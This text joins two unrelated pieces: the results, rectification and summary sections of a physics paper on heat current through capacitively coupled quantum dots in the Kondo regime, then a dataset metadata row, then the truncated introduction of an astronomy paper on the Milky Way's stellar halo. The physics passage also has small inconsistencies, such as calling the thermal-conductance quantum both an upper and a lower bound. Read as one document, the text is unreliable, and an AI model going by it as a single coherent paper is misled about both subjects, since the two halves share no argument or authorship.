of the same physical system differ by a factor two.\cite{asym}
Concretely, we fitted a popular phenomenological expression for $G(T)$
for the parameters used in Section \ref{res} with $U \rightarrow \infty$.
The renormalized parameters for RPT were taken from previous calculations.\cite{cb,ct} The result is
$T_K=0.00441 \Gamma$ for the RPT and $T_K=0.00796 \Gamma$ for the NCA.
In the symmetric cases with $U= 7 \Gamma$ and $U= 4 \Gamma$, we have obtained $T_K$ from the condition
$G(T_K)=G(T=0)/2$ with the result $T_K=0.191 \Gamma$ for $U= 7 \Gamma$ and $T_K=0.495 \Gamma$
for $U= 4 \Gamma$.
\section{Results for a symmetric device}
\label{res}
In this section we analyze and compare results for the thermal response of the system under investigation, calculated with the different methods presented in the previous section.
All calculations in this Section were done for $\mu_L=\mu_R=0$, $E_L=E_R=E$, and
$\Gamma_L=\Gamma_R=\Gamma$. In this case the system has reflection symmetry under a plane
bisecting the device.
\subsection{Thermal conductance}
\label{tcond}
We start by analyzing the behavior of the thermal conductance defined by Eq. (\ref{kappa}). For weak coupling to the reservoirs, and in the symmetric case $E_\nu=-U/2$, we can expand
Eq. (\ref{jqyada}) up to linear order in $\Delta T$ and we get the following result,
\begin{equation}\label{kappa-weak}
\kappa(T)= \frac{\Gamma_Q}{4 k_B} \; e^{U/2k_B T}\left[\frac{U}{T} f_R(U/2)\right]^2.
\end{equation}
This expression is exact in the limit $\Gamma \ll k_B T, U$.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{kthper.eps}
\caption{(Color online) Main panel: Thermal conductance as a function of the temperature for the symmetric configuration $E_L=E_R=-U/2$ and different values of $U$, calculated with PT (see
Section \ref{pert}). The dotted line
indicates the weak-coupling prediction Eq. (\ref{kappa-weak}) for $U/\Gamma=7$. The thin line corresponds to the quantum of thermal conductance [Eq. (\ref{quantum})].
Inset: Low-temperature part of the plots for $U/\Gamma=4, 7$, with the temperature expressed in units of $T_K$. The limit $U \rightarrow \infty$, calculated with RPT is also shown by the
dash-dot-dot line.}
\label{figkthper}
\end{center}
\end{figure}
Results for strong-coupling to the reservoirs are shown in Fig. \ref{figkthper}. We consider $\Gamma_L=\Gamma_R=\Gamma$, $\mu_L=\mu_R=0$. The results of the figure are calculated with the perturbation theory presented in Section \ref{pert}. The values of the Coulomb interaction $U$ have been chosen within the range
where the method has been probed to be reliable for the description of the electrical conductance. \cite{ogu} We have also verified that, for these values, the conservation of the energy current is satisfied within
and error of $14\%$ at the most. For $U/\Gamma=7$, we also include the prediction of Eq. (\ref{kappa-weak}) (see plot in dotted line in the main panel). The latter tends to coincide with the results of PT in the high-temperature limit.
In Fig. \ref{figkthper} we also indicate the reference defined by the quantum of thermal
conductance $\kappa_0$ [see Eq. (\ref{quantum})], which defines an upper bound per transmission channel. At low temperatures, $T\ll T_K$,
we find by a numerical fit of the results that $\kappa \sim T^4$. For $T \sim 0.5 T_K$ the dependence on $T$ evolves to linear. The slope of $\kappa$ for $T < \Gamma$ becomes closer to the slope of
$\kappa_0$ as $U$ increases. At temperatures $k_B T \sim \Gamma$
the conductance achieves a maximum and then decreases exponentially for larger $T$. The low-temperature regime can be further analyzed by representing the thermal conductance as a function of $T/ T_K$ (see inset of the Fig \ref{figkthper}).
The method used to determine $T_K$ is discussed in Section \ref{tk}.
The limiting case of $U\rightarrow \infty$, calculated with RPT (valid for $T \ll T_K$), is also shown. These results suggest a universal behavior of $\kappa$, independent of $U$, deep in the Kondo regime at small temperatures. Some deviations are however noticeable for $U=4 \Gamma$ for which charge fluctuations are very important, and the system is not strictly in the Kondo regime
$-E_\nu, E_\nu+U \gg \Gamma$.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{kcnca.eps}
\caption{(Color online) Main panel: Low-temperature behavior of the thermal conductance in the limit $U \rightarrow \infty$ for $E_L=E_R=-4\Gamma$, as a function of $T/T_K$, calculated with RPT (see Section \ref{rpt}) and NCA (see section \ref{nca}). The straight line corresponds to the quantum
bound [Eq. (\ref{quantum})]. Inset: Thermal conductance as a function of $T$ calculated with NCA.
}
\label{figkthuinf}
\end{center}
\end{figure}
In Fig. \ref{figkthuinf} we present results for the thermal conductance in the limit $U \rightarrow \infty$ for temperatures below $T_K$. We compare the results obtained with NCA
(see Section \ref{nca}) and RPT (Section \ref{rpt}). In this case, the parameters do not correspond
to the symmetric configuration. However, they correspond to the Kondo regime $-E_\nu, E_\nu+U \gg \Gamma$.
NCA overestimates the thermal conductance at the lowest temperatures, leading to a prediction higher than the upper bound
$\kappa_0$. This method is known to fail the description of the electrical conductance at very low $T$.\cite{win,asym} Here, we see that it is also inadequate to predict the low-temperature behavior of the thermal conductance.
In the case of RPT, the conservation of the energy current is satisfied to a good degree for
$T \leq 0.4 T_K$ with $d <5\%$ [see Eq. (\ref{d})]. This suggests the validity of this method to calculate the thermal conductance at low temperature.
As in the symmetric case shown in the inset of Fig. \ref{figkthper}, the behavior is consistent with a power law $\kappa \sim T^4$.
RPT overestimates the response at higher temperatures, close to $T_K$, where it is not expected to be valid.\cite{ng}
The fact that the RPT result for $\kappa (T)$ is above the lower bound given by Eq. (\ref{quantum})
for $T=T_K$ clearly shows the breakdown of the approximation at this temperature. In fact,
for increasing temperature, the error in the conservation of the current increases.
Specifically, the relative deviation $d$ is below 1\% for $T < 0.23 T_K$, increases to 7.7\% for
$T=T_K/2$ and to nearly 17\% for $T=T_K$. Overall, the analysis of these results suggests that deep in the Kondo regime, $T\ll T_K$, RPT is very likely to predict the correct behavior of $\kappa(T)$, while
for $T > T_K/2$, the NCA results are more reliable. Therefore, as in the case of the electric current,\cite{asym} both approaches are complementary.
It is encouraging to see that
in the transition between the range of validity of both approaches, they give the same order of magnitude of the thermal conductance when the results are scaled by the corresponding $T_K$.
The important physical outcome of this analysis is that we find a significant enhancement of the thermal response deep in the Kondo regime, in relation to the limit of weak coupling to the reservoirs.
Concretely, $\kappa \sim T^{4}$, for $T \ll T_K$ and $\kappa \propto T$ for $T\sim T_K$, with a proportionality constant smaller to the one in the quantum bound of Eq. (\ref{quantum}). This is in contrast
with the exponentially small thermal conductance at low temperatures given by Eq. (\ref{kappa-weak}), in the case of very low coupling to the reservoirs.
\subsection{Far-from-equilibrium thermal response}
The aim of the present section is to analyze the thermal current when $\Delta T= T_L-T_R >0$. As in the previous section, we consider $\Gamma_L=\Gamma_R=\Gamma$, $\mu_L=\mu_R=0$.
\subsubsection{Dependence of thermal current on $\Gamma_\nu$}
\label{depdelta}
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{gam.eps}
\caption{Thermal current as a function of dot-lead couplings For $T_L=2T_R$,
$U=k_BT_R/10$ and $E_L=E_R=-U/2$. }
\label{figdelta}
\end{center}
\end{figure}
We start by presenting in Fig. \ref{figdelta} results for small $U=k_BT_R/10$, where $T_R$ is the temperature of the coldest reservoir, in the symmetric configuration where $E_L=E_R=-U/2$. These parameters correspond to the high-temperature regime where the Kondo effect is not developed in equilibrium.
The evaluation have been done with perturbation theory as explained in Section \ref{pert}, which is accurate within the range $\Gamma \gg U$.
In the weak-coupling limit, with $\Gamma < U$ the thermal current is given by Eq. (\ref{jqf}), which for the symmetric configuration reduces to Eq. (\ref{jqyada}).
In the description of PT, the heat current increases linearly with $\Gamma$ for small values of these parameters as in Eq. (\ref{jqyada}).
For larger
$\Gamma$, the slope decreases and $J_Q$ reaches a maximum for $\Gamma \sim 0.8 T_R$. Then, it decreases for larger $\Gamma$. For all values of $\Gamma$ the relative deviation of the method in the conservation of the energy current $d$ is below 1\%. Interestingly, the qualitative behavior of $J_Q$ calculated with PT is very similar to the one presented in Ref. \onlinecite{yada}, on the basis of a saddle point approximation within the path-integral formalism.
\subsubsection{Dependence of the thermal current on $\Delta T$}
\label{dept}
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=7.5cm]{fig6.eps}\\
\caption{(Color online) Thermal current as a function of $T_L=\Delta T$ for $T_R=0$,
$E_L=E_R=-U/2$ and several values of $U$. The dotted line corresponds to Eq. (\ref{jqyada}) with $U=7\Gamma$.}
\label{figt}
\end{center}
\end{figure}
We now take $T_R=0$ and analyze the dependence of $J_Q$ on $T_L=\Delta T$,
using perturbation theory in $U$ for the symmetric case $E=E_L=E_R=-U/2$, as above.
We consider several values of $U$ within the validity of PT.
The results are shown in Fig. \ref{figt}. As in the previous section, we evaluate the limits of this
approach from the relative error in the conservation of the energy current
$d$. We have verified that it is negligible for very small temperatures
and moderate values of $U$, while it reaches a value of 12.6 \% for $U=7 \Gamma$ and $T_L \sim 2 \Gamma$, decreasing slowly with further increase in $T_L$.
For $U=7 \Gamma$, the system is in the Kondo regime ($-E, E+U \gg \Gamma$) at low temperatures and at equilibrium. Correspondingly, the spectral
density has a well defined peak at the Fermi energy (the Kondo peak) separated from the charge-transfer peaks
near $E$ and $E+U$.
For $T_L$ well below $T_K$ (we verify this for $T_L < 0.04 \Gamma$), the heat current behaves as $J_Q \sim (\Delta T)^4$.
This remains true as long as the smaller temperature ($T_R$ in our case) is also much smaller than
$T_K$. For large $T_R$, $J_Q$ is linear in $\Delta T$ for small $\Delta T$.
For all values of $U$, after the initial slow increase of the thermal current with $\Delta T$, for
$\Delta T \sim \Gamma$, $J_Q$ increases approximately linearly with $\Delta T$ and when it reaches a few times $U$ if finally saturates. For $U, T_R, \Delta T \gg \Gamma$, the thermal current is described by Eq. (\ref{jqyada}).
If in addition $T_L, T_R \gg U$, the heat current in the weak-coupling limit behaves as
\begin{equation}\label{bound}
J_Q \simeq \frac{\Gamma_Q U}{8} \; \left[ U \left(\frac{1}{T_R}-\frac{1}{T_L} \right) +\frac{E_L}{T_L}-\frac{E_R}{T_R} \right],
\end{equation}
which in the limit of $\Delta T \gg T_R$ saturates to $J_Q \sim \Gamma_Q U(U-E_R)/T_R $.
The result in the atomic limit described by Eq. (\ref{jqyada}), is shown in dotted line in the inset
for $U= 7 \Gamma$.
Note that the saturation value of Eq. (\ref{jqyada}) for $T_R=0$ at high $T_L$ is $\Gamma_Q U/4$.
Therefore, for the units of $J_Q$ chosen, the curves for different $U$ coincide at large $\Delta T$.
Clearly only for $U \gg \Gamma$ the saturation value of $J_Q$ for large $\Delta T$ predicted by RPT approaches the corresponding value in the atomic limit.
As in the case of the thermal conductance, when the two reservoirs have temperatures $T_R, T_L < T_K$, there is a strong enhancement in the value of the thermal current, for dots strongly coupled to reservoirs relative to the case where they are weakly coupled. In fact, the current is exponentially small at low temperatures for weakly coupled quantum dots. Instead,
within the Kondo regime, $J_Q \propto (\Delta T)^4$ for $T_R, T_L \ll T_K$, while $J_Q \propto (\Delta T) $ if either $\Delta T > T_K/2$ or the temperature of the coldest lead $T_R > \Delta T$.
Note that the latter case corresponds to the calculation of the thermal conductance defined by
Eq. (\ref{kappa}).
\subsubsection{The limit $U \rightarrow \infty$}
\label{uinf}
Here we choose parameters corresponding to the Kondo regime
(defined by $-E_\nu, E_\nu+U \gg \Gamma$) at equilibrium: $E_L=E_R=E=-4 \Gamma$, and
$U \rightarrow \infty$, and calculate the current using RPT and NCA (see Sections \ref{rpt}, \ref{nca}) as a function of $\Delta T$, keeping $T_R=0$ (RPT) or a small fraction of the
Kondo temperature (NCA) so that the results are indistinguishable from those of $T_R=0$ at equilibrium.
As in Section \ref{tcond}, in order to compare the results of RPT and NCA we scale the properties by
the corresponding Kondo temperature obtained previously,\cite{asym} as explained in that Section.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{jnca2.eps}
\caption{Thermal current as a function of $\Delta T$ for $U \rightarrow \infty$
and $E=-4 \Gamma$. Inset: Thermal current calculated with NCA for a wide range of temperatures.}
\label{figuinf}
\end{center}
\end{figure}
The result for $J_Q$ as a function of $\Delta T$ is shown in Fig. \ref{figuinf}. For small
temperatures $T < 0.2 T_K$, the RPT result is more reliable and shows a dependence $J_Q \sim \Delta T^4$.
For $T > T_K$, the RPT breaks down.
We show in the inset of Fig. \ref{figuinf} only results calculated with NCA for a wide range of temperatures, including the
high-temperature regime $T \gg T_K$.
In the latter plot, we observe that for high temperatures,
the thermal current saturates to a finite value. This behavior is the same observed for finite $U$ in the symmetric case (see Fig. \ref{figt}).
Notice that in the limit of $\Gamma \rightarrow 0$, Eq. (\ref{jqf}) $J_Q \rightarrow 0$ for $U \rightarrow \infty$. Instead, the present results show that the thermal current
at finite coupling to the reservoirs is ${\cal O}(\Gamma^2)$. Eq. (\ref{jqf}) does not account for this contribution, since it
corresponds to the \textit{linear} order term in $\Gamma$ of the thermal current.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=7cm]{jvse.eps}
\caption{(Color online) Full line: Thermal current as a function of dot energies $E$ for $k_B \Delta T =50 \Gamma$ and $U \rightarrow \infty$. Dashed line corresponds to $A/E^2$ where $A$ is a constant.}
\label{jvse}
\end{center}
\end{figure}
The above analysis has been done at a finite $E$, and one might wonder if a finite current remains
for $U \rightarrow \infty$ keeping $E=-U/2$ (symmetric case). Because of technical reasons, we can not directly address this question with the methods used in the present section.
We can in any case gather some intuition by calculating the dependence of the
thermal current with $E$ within NCA at a high temperature $T \gg T_K$.
The result is shown in Fig. \ref{jvse}. The current decreases with increasing $-E$.
We find that the dependence with the energy levels of both dots (taken equal) is very near
$E^{-2}$ for $E \gg \Delta T$. This result indicates that the thermal current vanishes for
$U \rightarrow \infty$ in the symmetric case $E=-U/2$. The reason for such a different behavior between the symmetric and non-symmetric configuration is that in the former one, there is a vanishing spectral weight at the Fermi energy.
In fact, for the far-from equilibrium situation analyzed here, the Kondo peak that develops at equilibrium is completed melted and the spectrum consists of the two Coulomb blockade peaks, which for $U \rightarrow \infty$ are at an infinitely high energy.
Instead,
for the parameters of Fig. \ref{figuinf}, there is some finite spectral weight at energies $E_L=E_R$, which enable the thermal transport.
\subsubsection{Dependence of thermal current on $U$}
\label{depu}
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{tvarias.eps}
\caption{(Color online) Thermal current as a function of $U$ for different $\Delta T=T_L$,
$T_R=0$, and $E_L=E_R=-U/2$. Results have been multiplied by a factor in some case, in order to present them in the same scale.}
\label{figtv}
\end{center}
\end{figure}
In Fig. \ref{figtv} we show the thermal current as a function of $U$ calculated with PT in the symmetric configuration $E_L=E_R=-U/2$, for different $\Delta T=T_L$,
keeping $T_R=0$. Since the thermal current strongly depends on $\Delta T$ for
small $\Delta T$,
the values have been multiplied by a factor indicated in the figure in order to represent them.
In spite of the different magnitude, the different curves show a similar dependence, with
a $U^2$ behavior for small $U$. We restrict the range of values $U$ to those satisfying the criterion of validity of the perturbative approach.
At intermediate $T_L$,
($0.5 \Gamma$ and $\Gamma$), the curves show a maximum within the interval of $U$ shown.
According to the limit of small $\Gamma$ [Eqs. (\ref{jqf}), (\ref{jqyada})], one expects that for large $\Delta T$ there is a maximum in the thermal current at an intermediate value of $U$. Since at high temperatures, the effects of correlations are expected to be less important, we have also calculated $J_Q$ for $\Delta T=10 \Gamma$ as a function of $U$ for an interval, which includes large values of $U$ lying (at least in principle) beyond the validity of the approach,
and compare it with the result in the atomic limit
$\Gamma_\nu \rightarrow 0$ [Eq. (\ref{jqyada})].
The result is shown in Fig. \ref{figt10}. Taking into account the
limitations of both approximations, the results are surprisingly similar. In particular both approaches lead to a maximum in the thermal current for $U \sim 3 \Delta T$. For small $U$ the perturbative approach gives a quadratic dependence in $U$. It is also quadratic in the atomic limit [Eq. (\ref{jqf})] for the symmetric case $E_\nu=-U/2$ if in addition both
$T_L, T_R >0$ but it is linear in $U$ for other cases (Fig. \ref{figt10}
corresponds to the symmetric case with $T_R=0$).
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{t10.eps}
\caption{(Color online) Same as Fig. \ref{figtv} for $\Delta T=T_L=10 \Gamma$.
Dashed line corresponds to Eq. (\ref{jqyada}).}
\label{figt10}
\end{center}
\end{figure}
It is clear that in the atomic limit [Eq. (\ref{jqf}) or Eq. (\ref{jqyada}) for the symmetric case $E_\nu=-U/2$ plotted in dashed line in Fig. \ref{figt10}], the heat current $J_Q$ vanishes for infinite Coulomb repulsion $U \rightarrow \infty$. While the perturbative result (full line in Fig. \ref{figt10}) lies above the prediction of the analytic expression in the atomic limit for large $U$, perturbation theory
loses its validity for large $U$ and cannot solve the issue of whether $J_Q$ is finite for $U \rightarrow \infty$. However, the NCA result presented in the previous section indicate that
in the symmetric case (keeping $E=-U/2$), $J_Q \rightarrow 0$ for $U \rightarrow \infty$, as discussed previously.
Concerning negative values of $U$, in the symmetric case $E_{\nu}=-U/2$, using the transformation Eq. (\ref{shiba}) one concludes that $J_Q(-U)=J_Q(U)$.
It is easy to check that Eq. (\ref{jqyada}) has this property. We have verified that this is also the case for the perturbative results.
\section{Rectification}
\label{recti}
In the calculations presented before we have considered $E_L=E_R$, although the analytical
results in the atomic limit $\Gamma_\nu \rightarrow 0$ [Eq. (\ref{jqf})] are valid for
arbitrary $E_\nu$. One effect of having different $E_\nu$ is the loss of the Kondo effect,
in a similar way as the application of a magnetic field in the simplest impurity Anderson model.
Another effect is that the current has a different magnitude when changing the sign of
$\Delta T$. This rectification effect might be important for applications.\cite{craven}
To keep our convention $T_L > T_R$, we analyze the effect of reflecting the device through the plane that separates the left and right parts, instead of inverting the temperature.
The result for the magnitude of the current is the same.
Note that if the system has reflection symmetry ($E_L=E_R$, $\Gamma_L=\Gamma_R$, $\mu_L=\mu_R$),
the magnitude of the current should be unchanged if $\Delta T$ is inverted. Eq. (\ref{jqf})
satisfies this symmetry requirement.
In this Section we keep $\mu_L=\mu_R=0$. Importantly, if the asymmetry is introduced only in the couplings ($\Gamma_L \neq \Gamma_R$), there is no rectification in the atomic limit, since
both $\Gamma_\nu$ enter only the prefactor of Eq. (\ref{jqf}). Instead, calculations with the NCA show some rectification effect taking asymmetric couplings but the effect is small and is not reported here.
Concerning PT, for small
$U$ the rectification properties are too small, while for large $U$ the error in the conservation
of the current increased rapidly and we consider that the results were not reliable enough.
Therefore in what follows we also take also $\Gamma_L=\Gamma_R$ and study the effect of different $E_\nu$ in the rectification, using Eq. (\ref{jqf}) for $\Gamma_\nu \rightarrow 0$ and the NCA
for other cases.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{rectif_atom_limt_EL-5.0_ER-14.3_TR1.eps}
\caption{(Color online) Thermal currents given by Eq. (\ref{jqf}) as a function of
$\Delta T$ for $T_R=\Gamma$, $\Gamma_L=\Gamma_R=\Gamma $, $U=20 \Gamma$
and full line $E_L=-14.3 \Gamma$, $E_R=+5\Gamma$ (level nearest to the Fermi energy next to the cold lead), dashed line $E_L=+5\Gamma$, $E_R=-14.3\Gamma$ (level nearest to the Fermi energy next to the hot lead).}
\label{rectif-1}
\end{center}
\end{figure}
In Fig. \ref{rectif-1} we show an example of this rectification effect in the atomic limit.
We have taken one level below and the other one above the Fermi energy.
We obtain that the magnitude of the heat current is larger, labeled as $J_{+}$ in the figure,
when the level above the Fermi energy is next to the lead with the lower temperature.
The opposite direction is labeled as $J_{-}$.
For this choice of parameters, the ratio between both
currents increases monotonically with $\Delta T$ until $\Delta T\sim 10\Gamma$ and then seems to saturate in a high value of the order of $160$, see inset of figure \ref{rectif-1}. We must warn, however, that such large values of the ratio $J_+/J_-$ are related to the exponentially small occupancies in the limit $\Gamma_\nu \rightarrow 0$. This effect
disappears for large $\Gamma_\nu$.
The rectification can be quantified by the ratio
\begin{equation}\label{r}
\mathcal{R}=\big\vert \frac{J_{+}-J_{-}}{J_{+}+J_{-}}\big\vert
\end{equation}
being $\mathcal{R}=1$ the upper bound.
In Fig. \ref{rectif-2} we show the values of $\mathcal{R}$ within the atomic limit as a function of both, $E_L$ and $E_R$ for a selected value of $\Delta T=20\Gamma$ while keeping the other parameters as in figure \ref{rectif-1}. Note that the choice of energy levels in Fig. \ref{rectif-1} corresponds to a region in which $\mathcal{R}\sim 1$.
There are two straight lines in Fig. \ref{rectif-2} that correspond to zero rectification.
In one of them $E_R=E_L$, in which both levels are degenerate, the ratio $\mathcal{R}$ vanishes
due to reflection symmetry, $L \longleftrightarrow R$.
The other line $E_R=-U-E_L$ results as a combination of reflection symmetry and the transformation Eq. (\ref{shiba}). In fact the equation for the transformed parameters
$E_R^\prime=E_L^\prime$, using Eq. (\ref{shibap}) reduces to $E_R=-U-E_L$.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{mapa-atom-limit-DT20.eps}
\caption{(Color online) Rectification coefficient given by Eq. (\ref{r})
calculated in the atomic limit
as a function of both energy levels and $\Delta T=20\Gamma$ and $T_R=\Gamma$ and $U=20 \Gamma$.}
\label{rectif-2}
\end{center}
\end{figure}
There is another line of nearly circular shape, in which $\mathcal{R}$ vanishes
which is not related with symmetry properties,
inside a region of small rectification (and therefore of marginal interest).
The region inside this line shrinks for increasing
temperature of the cold lead ($T_R$ in our case). Keeping the other parameters
of Fig. \ref{rectif-2} fixed, we find that this region
collapses to the point $E_L=E_R=-U/2$ for $T_R \sim 1.5 \Gamma$.
Near the upper right corner of Fig. \ref{rectif-2} the magnitude of the heat current is larger,
when the level above the Fermi energy is next to the lead with the lower temperature,
and there is a sign change in $J_+ - J_-$ when crossing the three lines mentioned above.
In Fig. \ref{recnca} we show the results for $\mathcal{R}$ obtained with the NCA for infinite $U$.
For regions of parameters where the rectification is important,
the largest magnitude of the thermal current is obtained when the level nearest to the Fermi
energy is next to the cold lead. This is consistent with the results for the atomic limit presented above.
The behavior of $\mathcal{R}$ as a function of both energy levels is quite similar to the one found within the atomic limit.
In the top panel of Fig. \ref{recnca}, the line $E_L=E_R$ with $\mathcal{R}=0$ is clearly visible and a piece of a curved line with zero rectification also appears. Due to the infinite value of the Coulomb repulsion, the line $E_R=-U-E_L$ with $\mathcal{R}=0$, is not accessible.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{mapa_nca_DT2.5_T1.eps}
\includegraphics[clip,width=\columnwidth]{rectif_NCA_EL-10.0_ER1.5_TR1.eps}
\caption{(Color online) Top panel: rectification coefficient calculated with NCA
in the $U \rightarrow \infty$ limit
as a function of both energy levels and $\Delta T=2.5\Gamma$ and $T_R=\Gamma$. Bottom panel:
Thermal currents as a function of $\Delta T$ for $T_R=0$, $\Gamma_L=\Gamma_R=\Gamma $, $U=\infty$
and full line $E_L=-10 \Gamma$, $E_R=+1.5\Gamma$ (level nearest to the Fermi energy next to the cold lead), dashed line $E_L=+1.5\Gamma$, $E_R=-10\Gamma$ (level nearest to the Fermi energy next to the hot lead). }
\label{recnca}
\end{center}
\end{figure}
Furthermore, the individual currents in both directions, $J_{+}$ and $J_{-}$, display a similar dependence with $\Delta T$ as in the previous case. See the bottom panel of Fig. \ref{recnca}.
However, the maximum ratio $J_+/J_-$ is reduced from 160 to 16. This is due to that fact that
the exponentially small occupancies of some states that take place for $\Gamma_\nu \rightarrow 0$
are lost for finite $\Gamma_\nu$.
\section{Summary and discussion}
\label{sum}
We have studied the thermal current through a system of two capacitively coupled quantum dots
connected in series with two conducting leads in the spinless case (corresponding to a high
applied magnetic field). The system is also equivalent to a molecular quantum dot
with two relevant levels connected to the leads in such a way that there is perfect destructive interference in the spinless case, and to one spinfull dot between two
conducting leads fully spin polarized in opposite directions. We expect that our main qualitative results are valid when the spin is included in the former two cases.
An interesting feature of the system is that charge transport is not possible, but heat transport is, due to the effect of the Coulomb repulsion between the electrons in the dots,
leading to a strong violation of the Wiedemann-Franz law. A simple picture of the effect of
the Coulomb repulsion in the heat transport is provided in Section \ref{pict}.
The system has been studied previously in the regime of high temperatures of both leads \cite{ruoko,yada}
(including also the full counting statistics \cite{yada}). We extend those results
in the limit of small coupling to the leads for arbitrary values of the other parameters. We analyze exhaustively the different regimes of this system, considering all temperatures and couplings between dots and reservoirs.
In particular, the Kondo regime in which there is one particle strongly localized in the double dot, but fluctuating between both dots.
For high temperatures of the leads,
our results agree in general with the previous ones, confirming that the heat current displays
a non-monotonic behavior as a function of Coulomb repulsion and/or coupling to the leads, with a maximum at intermediate values.
For temperatures $T$ well below the Kondo energy scale $T_K$, we obtain that the thermal
conductance is proportional $T^4$ and the heat current is proportional to $\Delta T^4$,
where $\Delta T$ is the difference between the temperatures of both reservoirs.
In both cases the behavior changes to linear for $T, \Delta T > T_K$. This implies an important enhancement of the thermal response at low temperatures,
in relation to the case where the coupling between the quantum dots and the reservoirs is very small, where the thermal response is exponentially small.
This property is relevant for the implementation of energy harvesting mechanisms at low temperatures.
As a function of Coulomb repulsion $U$, for high $\Delta T$ and small tempearature of the cold lead, the heat current has a maximum for $U \sim 3 \Delta T$ and decreases with increasing $U$.
For infinite $U$, we find that the heat current is finite for all non-zero values of
$\Delta T$ and finite values of the energy levels of the dots $E_\nu$.
Within the Kondo regime, this result can be understood in the frame of renormalized perturbation theory: near the Fermi energy, the main aspects of the physics can be described in terms of dressed weakly interacting quasiparticles. Even if the bare Coulomb repulsion $U \rightarrow \infty$,
the renormalized one $\widetilde{U}$ is small and comparable with the renormalized
coupling to the leads. Nevertheless, even at temperatures several orders of magnitude larger
than $T_K$, for which the Kondo effect is destroyed, we obtain a non-zero heat current
for infinite Coulomb repulsion, if $E_\nu$ remains finite.
Instead, in the symmetric case $E_\nu=-U/2$, the current vanishes for $U \rightarrow \infty$.
When the energy levels $E_\nu$ or the the coupling to the leads $\Gamma_\nu$ are different,
the system loses its reflection parity through the plane containing the mid point between the dots, and therefore, one expects that the absolute value of the heat current $J_Q$ is different for positive or negative temperature difference $\Delta T$. This means that the device has some rectifying properties. In the case in which
only the thermal gradient breaks inversion symmetry one has $J_Q(-\Delta T)=-J_Q(\Delta T)$,
our results suggest that the asymmetry in the couplings $\Gamma_L \neq \Gamma_R$ modifies the
amplitude of the current but has little effect on the rectifying properties. Instead, when
$E_L \neq E_R$, a factor larger than ten between the current flowing in opposite senses can be
obtained. Our results indicate that the rectification is largest when one level is above and
near the Fermi energy and the other below the Fermi energy. The largest magnitude of the thermal current is obtained when the former is next to the cold lead.
It is possible that this effect might be increased adding more dots in series.
\section*{Acknowledgments}
We thank Rafael S\'anchez and H. K. Yadalam for helpful discussions.
We are supported by PIP 112-201501-00506 of CONICET and PICT 2013-1045, PICT-2017-2726
of the ANPCyT. LA also acknowledges support from
PIP- RD 20141216-4905 of CONICET, CNR-CONICET, and PICT-2014-2049 from Argentina, as well as the Alexander von Humboldt Foundation, Germany.
| 2024-02-18T23:40:04.566Z | 2019-12-18T02:13:53.000Z | algebraic_stack_train_0000 | 1,251 | 10,853 |
|
proofpile-arXiv_065-6201 | \section{Introduction}
\label{sec:introduction}
An extended and diffuse stellar halo envelops the Milky Way. Although
only an extremely small fraction of the stars in the Solar
neighbourhood belong to this halo, they can be easily recognized by
their extreme kinematics and metallicities. Stellar populations with
these properties can now be followed to distances in excess of
100~kpc using luminous tracers such as RR Lyraes, blue horizontal
branch stars, metal-poor giants and globular clusters
(e.g. Oort 1926; Baade 1944; Eggen, Lynden-Bell \& Sandage 1962; Searle \& Zinn 1978; Yanny {et~al.} 2000; Vivas \& Zinn 2006; Morrison {et~al.} 2009).
In recent years, large samples of halo-star velocities
(e.g. Morrison {et~al.} 2000; Starkenburg {et~al.} 2009) \newt{and}
`tomographic' photometric and spectroscopic surveys have shown that
the stellar halo is not a single smoothly-distributed entity, but
instead a superposition of many components
(Belokurov {et~al.} 2006; Juri{\'c} {et~al.} 2008; Bell {et~al.} 2008; Carollo {et~al.} 2007, 2009; Yanny {et~al.} 2009). Notable
substructures in the Milky Way halo include the broad stream of stars
from the disrupting Sagittarius dwarf galaxy
(Ibata, Gilmore \& Irwin 1994; Ibata {et~al.} 2001), extensive and diffuse overdensities
(Juri{\'c} {et~al.} 2008; Belokurov {et~al.} 2007a; Watkins {et~al.} 2009), the Monoceros
`ring' (Newberg {et~al.} 2002; Ibata {et~al.} 2003; Yanny {et~al.} 2003), the orphan stream
(Belokurov {et~al.} 2007b) and other kinematically cold debris
(Schlaufman {et~al.} 2009). Many of these features remain unclear. At
least two kinematically distinct `smooth' halo components have been
identified from the motions of stars in the Solar neighbourhood, in
addition to one or more `thick disc' components
(Carollo {et~al.} 2009). Although current observations only hint at
the gross properties of the halo and its substructures, some general
properties are well-established: the halo is extensive
($>100\:\rm{kpc}$), metal-poor
($\mathrm{\langle[Fe/H]\rangle\sim{-1.6}}$,
e.g. Laird {et~al.} 1988; Carollo {et~al.} 2009) and contains of the order
of 0.1-1\% of the total stellar mass of the Milky Way
\newt{(recent reviews
include Freeman \& Bland-Hawthorn 2002; Helmi 2008)}.
Low surface-brightness features seen in projection around other galaxies
aid in the interpretation of the Milky Way's stellar halo, and vice
versa. Diffuse concentric `shells' of stars on $100$~kpc scales around
otherwise regular elliptical galaxies \newt{have been} attributed to
accretion events (e.g. Schweizer 1980; Quinn 1984). Recent surveys of
M31 (e.g. Ferguson {et~al.} 2002; Kalirai {et~al.} 2006; Ibata {et~al.} 2007; McConnachie {et~al.} 2009) have
revealed an extensive halo (to $\sim150\,\rm{kpc}$) also displaying
abundant substructure. The surroundings of other nearby Milky Way
analogues are now being targeted by observations using
resolved star counts to reach very low effective surface brightness
limits, although as yet no systematic survey has been carried out to
sufficient depth.
(e.g. Zibetti \& Ferguson 2004; McConnachie {et~al.} 2006; de~Jong, Radburn-Smith \& Sick 2008; Barker {et~al.} 2009; Ibata, Mouhcine, \& Rejkuba 2009).
A handful of deep observations beyond the Local Group suggest that
stellar haloes are ubiquitous and diverse
(e.g. Sackett {et~al.} 1994; Shang {et~al.} 1998; Malin \& Hadley 1999; Mart{\'{i}}nez-Delgado {et~al.} 2008, 2009; Fa{\'{u}}ndez-Abans {et~al.} 2009).
Stellar haloes formed from the debris of disrupted satellites are a
